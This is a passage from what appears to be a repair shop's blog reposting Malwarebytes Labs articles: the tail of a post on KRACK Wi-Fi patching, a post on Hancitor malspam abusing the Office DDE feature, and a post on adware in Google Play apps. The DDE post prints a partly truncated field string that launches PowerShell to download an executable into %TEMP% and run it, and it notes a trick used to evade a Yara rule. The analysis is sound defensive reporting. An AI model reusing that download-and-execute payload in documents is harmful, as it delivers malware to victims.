  • This won’t be fixed fully until the Wi-Fi standard is changed.

What to do about it

  • Run updates on all your devices, systems, and software. If you don’t have automatic updates on your windows machine, look out for the Microsoft patch, which they issued on October 10.
  • Android users: Keep your eyes peeled for updates from Google, which they said would be available in the coming weeks.
  • If you’ve got Apple products, sit tight for the next software update, which should include patches that the company has created for its beta versions of iOS, watchOS, tvOS, and macOS.
  • See if your router manufacturers have issued updated firmware that addresses this vulnerability and update as soon as possible. If not, you might consider replacing the router.
  • It is important to keep in mind that it’s not only individuals who are impacted by this vulnerability, but also businesses. Any Wi-Fi deployment that uses WPA2 can be exploited. This means organizations should also push updates and be sure remote workers are securing their devices and systems as well.

The post Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 17, 2017
Comments Off on Old MS Office feature weaponized in malspam attacks

Old MS Office feature weaponized in malspam attacks

There has been a lot of talks recently following a write up and proof of concept about a Microsoft Office feature that can be misused and weaponized by malicious actors. The protocol, known as Dynamic Data Exchange (DDE), has actually been around for a long time, and allows applications to exchange data and send updates to each other. This feature can be used, for example, to refresh a cell in Excel with data coming from another program.

Now threat actors are using this feature to distribute malware without relying on macros or exploits.

Perhaps what makes this technique most interesting is the fact that malicious actors can craft booby trapped documents void of any macro and still achieve code execution. Macros have been a favourite among spammers but they are highly suspicious, and many system administrators have set up group policies to disable them completely. This is why cybercriminals seek out any other way to deliver malware via Office files.

In the case of the DDE method, no exploits are used. Instead, a social engineering technique is employed to entice users into clicking a prompt.

First, the DDE was used in some targeted attacks. However, now it has become mainstream with the group behind Hancitor (spotted by @James_inthe_box and DDE identified by @mesa_matt), who leveraged it in their latest spam campaign.

We can find where the malicious code is inserted by checking for any reference to DDE within the document’s code. Didier Stevens published a Yara rule for this very purpose, but it seems the miscreants evaded detection by splitting the string of interest:

The final code put together looks like this:

"DdE" c:\Windows\System32\cmd.exe " /k powershell.exe (New-Object System.Net.
'%TEMP%\tvs.exe');Start-Process '%TEMP%\tvs.exe'"

The rest of the attack is straight forward, with PowerShell downloading and running the malicious binary (Hancitor) from the %temp% folder.

Office and malspam

Microsoft Office is being abused in both targeted and large-scale campaigns by malware authors who use a wide variety of techniques to execute malicious code. The DDE method is not new at all, but it is an example of how forgotten features can come back to haunt us.

Microsoft did not deem this a vulnerability, and so far has not decided to release a patch to render it harmless. One has to wonder how many people are still using DDE for legitimate purposes and consider the validity of retaining it.

Malwarebytes users are already protected against this latest campaign and similar ones.

Indicators of compromise

Word document




The post Old MS Office feature weaponized in malspam attacks appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 17, 2017
Comments Off on Yet more mobile adware found in Google Play

Yet more mobile adware found in Google Play

Finding an adware variant that made its way past the Google Play store is out of the ordinary. So when two adware variants slip by in one week, we take notice. Last week, we added two new Ad SDKs to our growing list of adware detections—Adware.Solid and Adware.Cootek. Both Ad SDKs were found in an abundance of apps in Google Play. Adware.Cootek infects over 2,000 Play store apps alone, according to our Mobile Intelligence System.

Behaving badly

Both pieces of adware have remarkably similar traits, displaying full screen ads inside and outside of the infected running app. In addition, they both show ads during screen lock and immediately after unlocking the screen. For your viewing pleasure, below you can find an array of offending ads with captions detailing the inappropriate timing:

Click to view slideshow.

We’re listening

Ads displayed inside a free app? Fair game. Ads displayed outside the app, especially during and immediately after screen lock? That, my dear readers, is where we draw the line. Many of these apps contain reviews on Google Play addressing the aggressive nature of the ads contained. Unfortunately, these reviews fall on the deaf ears of the app developers. But fear not my friends, for we are listening. Whether it’s in Google Play or not, we take a hard stance on aggressive adware. Cue shameless (yet helpful) plug: Malwarebytes for Android warns you when Ads are crossing the line.

Use common sense

A note to app developers. We get that you need to make some revenue from your hard work, and selecting an appropriate Ad SDK to tack onto your apps is tough business. Perhaps it’s unfair to take the blame when at the time the Ad SDK was selected, it wasn’t considered adware. However, I ask this question: How many bad reviews does it take before you repackage with another, less offensive, Ad SDK? One app we found which will remain nameless had around 400 one star reviews, and I’m willing to bet most were addressing the aggressive ads. Think about how you’d like to interact with an app: would all of those aggressive ads make you enjoy the app even more, or would they frustrate you? Use common sense when selecting an Ad SDK.

It’s up to the user

As already addressed in our Mobile Menace Monday post, we know that mobile adware is not dangerous malware—more like an inconvenience. In some cases, it goes behind annoyance when it is collects too much personal information. This can include GPS location, phone number, IMEI, and IMSI. Still, this isn’t a blatant act of maliciousness as seen from far more threatening pieces of malware.

It’s fully up to you, the user, whether to delete the offending app or ignore our warnings. If you choose to ignore and accept the presence of these annoying ads and/or the potential to collect personal information, no further harm should come your way. Admittedly, we can’t fully guarantee this claim—thus, I leave you with this: Ignore at your own risk.

Unfortunately, we called it

When Google Play Protect was released, I conveyed my concern for adware along with other Potentially Unwanted Programs (PUPs) still making their way into the Play market. Unsurprisingly, here we are with two new pieces of adware found in one week. My prediction is that this is only the beginning. Stay safe out there!

The post Yet more mobile adware found in Google Play appeared first on Malwarebytes Labs.

Powered by WPeMatico


Location and hours

Txt/Email or CALL NOW to discuss your recovery plan.
Computer repair association logo